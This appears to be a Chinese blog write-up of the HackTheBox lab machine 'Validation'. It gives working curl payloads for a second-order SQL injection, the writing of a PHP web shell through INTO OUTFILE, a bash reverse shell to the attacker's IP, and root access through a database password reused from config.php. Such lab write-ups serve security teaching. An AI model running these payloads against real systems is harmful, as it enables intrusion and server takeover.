title: HackTheBox-Validation-SQLi author: Mosaic Theory layout: true categories: 漏洞实验 tags:
-
• 打靶日记
Stars are bright everywhere, depending on whether you look up to see them.
星星在哪里都是很亮的,就看你有没有抬头去看他们。
HackTheBox-Validation
Recon:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 01:08:15 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4566/tcp on 10.10.11.116
Discovered open port 80/tcp on 10.10.11.116
Discovered open port 22/tcp on 10.10.11.116
Discovered open port 8080/tcp on 10.10.11.116 Nmap scan report for 10.10.11.116
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open http nginx
|_http-title: 403 Forbidden
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds一个注册页面:
添加之后会回显在页面:
如果在同一个地点添加不一样的用户名也会回显:
>> dirsearch -u http://validation.htb/ -e php
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940
[09:18:48] 403 - 279B - /.htpasswds
[09:18:48] 403 - 279B - /.httr-oauth
[09:18:49] 403 - 279B - /.htpasswd_test
[09:19:01] 200 - 16B - /account.php
[09:19:14] 200 - 0B - /config.php
[09:19:17] 301 - 314B - /css -> http://validation.htb/css/
[09:19:25] 200 - 16KB - /index.php
[09:19:25] 200 - 16KB - /index.php/login/
[09:19:26] 403 - 279B - /js/
[09:19:26] 301 - 313B - /js -> http://validation.htb/js/
config读取不出来,login与index一样,只是没有了渲染。
POST / HTTP/1.1
Host: validation.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://validation.htb
DNT: 1
Connection: close
Referer: http://validation.htb/
Cookie: user=ca28b722bc10aa4b3beb941d5ca220ca
Upgrade-Insecure-Requests: 1
username=admin&country=BrazilSQLi:
无论如何更改参数服务器都会响应一个set cookie,如果在Country后边添加一个单引号,服务器一样会返回一个cookie,但是如果用它返回的cookie当作用户名,服务端会返回一些报错信息:
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome 21232f297a57a5a743894a0e4a801fc3'</h1><h3 class="text-white">Other Players In Brazil'</h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33为验证这个猜想,我在单引号后边又添加了注释:
>> curl -v -d "username=hack&country=Brazil'-- -" http://validation.htb
* Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:49:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host validation.htb left intact>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
* Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> GET /account.php HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 17 May 2022 01:50:54 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Vary: Accept-Encoding
< Content-Length: 762
< Content-Type: text/html; charset=UTF-8
<
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>admin</li> </div>
</section>
</div>
* Connection #0 to host validation.htb left intact这次并没有报错,这似乎是一个二次注入:
>> curl -v -d "username=hack&country=Brazil'union select 1--+" http://validation.htb
* Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 46
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:55:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host validation.htb left intact>> curl -v --cookie "user=21232f297a57a5a743894a0e4a801fc3" http://validation.htb/account.php<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome admin</h1><h3 class="text-white">Other Players In Belgium' union select 1-- -</h3><li class='text-white'>1</li></div>
</section>
</div>
* Connection #0 to host validation.htb left intact看起来有回显。
>> curl -v -d "username=hack&country=Brazil'union select user()--+" http://validation.htb>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select user()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>uhc@localhost</li> </div>
</section>
</div>获取到当前用户:uhc@localhost。
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php<!------ Include the above in your HEAD tag ---------->
<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select database()-- </h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>registration</li> </div>
</section>
</div>
* Connection #0 to host validation.htb left intact当前数据库registration:
>> curl -v -d "username=hack&country=Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -" http://validation.htb>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -</h3><li class='text-white'>mosaic</li><li class='text-white'>mosaicd</li><li class='text-white'>SELECT</li><li class='text-white'>INSERT</li><li class='text-white'>UPDATE</li><li class='text-white'>DELETE</li><li class='text-white'>CREATE</li><li class='text-white'>DROP</li><li class='text-white'>RELOAD</li><li class='text-white'>SHUTDOWN</li><li class='text-white'>PROCESS</li><li class='text-white'>FILE</li><li class='text-white'>REFERENCES</li><li class='text-white'>INDEX</li><li class='text-white'>ALTER</li><li class='text-white'>SHOW DATABASES</li><li class='text-white'>SUPER</li><li class='text-white'>CREATE TEMPORARY TABLES</li><li class='text-white'>LOCK TABLES</li><li class='text-white'>EXECUTE</li><li class='text-white'>REPLICATION SLAVE</li><li class='text-white'>BINLOG MONITOR</li><li class='text-white'>CREATE VIEW</li><li class='text-white'>SHOW VIEW</li><li class='text-white'>CREATE ROUTINE</li><li class='text-white'>ALTER ROUTINE</li><li class='text-white'>CREATE USER</li><li class='text-white'>EVENT</li><li class='text-white'>TRIGGER</li><li class='text-white'>CREATE TABLESPACE</li><li class='text-white'>DELETE HISTORY</li><li class='text-white'>SET USER</li><li class='text-white'>FEDERATED ADMIN</li><li class='text-white'>CONNECTION ADMIN</li><li class='text-white'>READ_ONLY ADMIN</li><li class='text-white'>REPLICATION SLAVE ADMIN</li><li class='text-white'>REPLICATION MASTER ADMIN</li><li class='text-white'>BINLOG ADMIN</li><li class='text-white'>BINLOG REPLAY</li><li class='text-white'>SLAVE MONITOR</li> </div>
</section>
</div>
* Connection #0 to host validation.htb left intact我当前的用户权限很多,而且它拥有File权限:
>> curl -v -d "username=hack&country=Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - " http://validation.htb/>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php<div class="container">
<h1 class="text-center m-5">Join the UHC - September Qualifiers</h1>
</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<h1 class="text-white">Welcome hack</h1><h3 class="text-white">Other Players In Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - </h3><br />
<b>Fatal error</b>: Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
thrown in <b>/var/www/html/account.php</b> on line <b>33</b><br />
* Connection #0 to host validation.htb left intact>> curl http://validation.htb/test.txt
can you see me ?
我可以写WebShell,符号太多会出错,可进行编码:
>> curl -v -d "username=hack&country=Belgium' union select %22%3C%3Fphp%20SYSTEM(%24_REQUEST%5B%27cmd%27%5D)%3B%20%3F%3E%22%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fshell.php%27%3B--%20-" http://validation.htb>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php>> curl http://validation.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Reverse shell:
>> curl http://validation.htb/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.7/9001 0>&1"'>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.116] 40708
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@validation:/var/www/html$script /dev/null -c bash
^Z
stty raw -echo; fg
reset
screen对用户目录有读取权限:
www-data@validation:/var/www/html$ ls
account.php config.php css index.php js shell.php
www-data@validation:/var/www/html$ cd ~
www-data@validation:/var/www$ ls
html
www-data@validation:/var/www$ cd /
www-data@validation:/$ cd home/
www-data@validation:/home$ ls
htb
www-data@validation:/home$ cd htb/
www-data@validation:/home/htb$ ls
user.txt
www-data@validation:/home/htb$ cat user.txt
07..................................在配置文件里有一串密码,uhc用户会提示不存在,但是尝试密码复用root会成功:
www-data@validation:/var/www/html$ ls
account.php config.php css index.php js
www-data@validation:/var/www/html$ cat config.php
<?php
$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-9qual-global-pw";
$dbname = "registration";
$conn = new mysqli($servername, $username, $password, $dbname);
?>
www-data@validation:/var/www/html$ su uhc
su: user uhc does not exist or the user entry does not contain all the required fields
www-data@validation:/var/www/html$ su -
Password:
root@validation:~# cat /root/root.txt
7a..................................原文始发于微信公众号(老鑫安全):HackTheBox-Validation
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论